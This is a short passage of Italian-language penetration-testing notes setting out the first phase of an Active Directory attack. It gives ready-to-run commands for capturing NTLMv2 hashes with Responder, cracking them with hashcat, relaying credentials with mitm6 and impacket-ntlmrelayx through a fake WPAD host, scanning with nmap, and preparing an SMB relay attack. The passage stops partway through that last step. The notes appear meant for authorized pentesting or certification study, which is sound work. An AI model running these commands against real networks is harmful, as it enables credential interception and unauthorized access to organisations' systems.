Indice dei contenuti
FASE 1 - RECONNAISSANCE / ENUMERATION
Primi step + Enumeration + Inicial Access
- Eseguo Responder: “ascolto” del traffico e intercettazione di hash NTLMv2
sudo responder -I <INTERFACE> -dwv
Se intercetto un hash: cracking con hashcat
hashcat -m 5600 <hashes.txt> <WORDLIST.txt>
- Medesimo scopo: attacco mitm6 (per massimo 10-15 minuti), eseguendo in due schede diverse
impacket-ntlmrelayx -6 -t ldaps://<IP> -wh fakewpad.<DOMAIN.local> -l <NOME_CARTELLA>
e
sudo mitm6 -d <DOMAIN.local>
- Scansione con nmap per identificare dominio, porte, servizi ed eventuali vulnerabilità
nmap -T4 -p- -sC -sV -Pn <IP>
- Se dalla scansione emerge la vulnerabilità di smb “signed required but not enabled", possiamo effettuare un smb relay attack. Mettiamo in off le voci smb e http in /etc/responder/Responder.conf, creiamo un file TARGETS.txt con gli indirizzi IP delle macchine vulnerabili e poi eseguiamo in due schede diverse: